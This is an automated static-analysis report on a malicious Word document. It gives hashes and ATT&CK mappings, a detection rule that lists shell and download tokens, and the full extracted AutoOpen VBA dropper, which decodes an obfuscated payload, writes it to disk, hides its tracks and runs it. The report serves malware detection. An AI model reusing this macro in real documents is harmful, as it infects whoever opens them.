Malicious Office (OLE) / .DOCX — malware analysis report

Static analysis result for SHA-256 1174fd03271f80f5…

MALICIOUS

Office (OLE) / .DOCX

1.94 MB Created: 2020-09-22 03:08:00 Authoring application: Microsoft Office Word First seen: 2026-05-13
MD5: 6e815cacb43c9bc055399a4fd4922ebc SHA-1: fe1894d343484cb3dc7ec16bef8252bd64cb7b6e SHA-256: 1174fd03271f80f5e2a6435c72bdd0272a6e3a37049f6190abf125b216a83471
108 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample contains VBA macros, including an AutoOpen subroutine, which is a common technique for executing malicious code upon document opening. The script utilizes Base64 decoding and XOR obfuscation to hide its payload, which is then likely executed via CreateObject. This indicates the document is designed to download and run a secondary malicious component.

Heuristics 4

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set xmlDoc = CreateObject("MSXML2.DOMDocument")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2918 bytes
SHA-256: 53eaadad198752eaaf33f8504dd37e174992c8ac25ebe53bf3e471a3ba748521
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Private Function Base64Decode(base64 As String) As Variant
    Dim xmlDoc As Object
    Dim xmlNode As Object
    
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set xmlNode = xmlDoc.createElement("b64")
    
    xmlNode.dataType = "bin.base64"
    xmlNode.Text = base64
    
    Base64Decode = xmlNode.nodeTypedValue

End Function
Private Function GetStringData(data As String) As String
    Dim decData As Variant
    Dim nLen As Long
    Dim strPath As String

    decData = Base64Decode(data)
    nLen = UBound(decData) - LBound(decData) + 1

    strPath = ""
    For inx = 0 To nLen - 1
        strPath = strPath & Chr((decData(inx) Xor 37) + 134 - 256)
    Next inx
    GetStringData = strPath
End Function
Private Function GetBufferData(data As String) As Variant
    Dim decData As Variant
    Dim nLen As Long

    decData = Base64Decode(data)
    nLen = UBound(decData) - LBound(decData) + 1

    For inx = 0 To nLen - 1
     If ((decData(inx) Xor 214) + 55) > 255 Then
        decData(inx) = (decData(inx) Xor 214) + 55 - 256
     Else
        decData(inx) = (decData(inx) Xor 214) + 55
     End If
    Next inx
    GetBufferData = decData
End Function
Sub AutoOpen()
'
' AutoOpen Macro
'
'
Dim strPath As String
Dim strArgment As String
Dim DataBuffer As Variant
Dim PBuffer() As Byte
Dim strObject As String

If ActiveDocument.Shapes.Count < 1 Then Exit Sub

strPath = GetStringData(ActiveDocument.Shapes("Text Box 3").TextFrame.TextRange.Text)
strArgment = GetStringData(ActiveDocument.Shapes("Text Box 4").TextFrame.TextRange.Text)
DataBuffer = GetBufferData(ActiveDocument.Shapes("Text Box 5").TextFrame.TextRange.Text)
nLen = UBound(DataBuffer) - LBound(DataBuffer) + 1
strObject = GetStringData(ActiveDocument.Shapes("Text Box 6").TextFrame.TextRange.Text)
    
    ReDim PBuffer(nLen)
    For inx = 0 To nLen - 1
        PBuffer(inx) = DataBuffer(inx)
    Next inx

    Open strPath For Binary Lock Write As #1
    Put #1, 1, PBuffer
    Close #1
    
    
    ActiveDocument.Shapes("Text Box 2").Select
    Selection.ShapeRange.TextFrame.TextRange.Select
    Selection.Collapse
    Selection.WholeStory
    Selection.Copy
    Selection.ShapeRange.Select
    Selection.MoveUp Unit:=wdScreen, Count:=1
    Selection.WholeStory
    Selection.Delete Unit:=wdCharacter, Count:=1
    Selection.PasteAndFormat (wdFormatOriginalFormatting)
    ActiveDocument.Save
    
    Set objShell = CreateObject(strObject)
    objShell.Run strArgment, 0, False
    Set objShell = Nothing
End Sub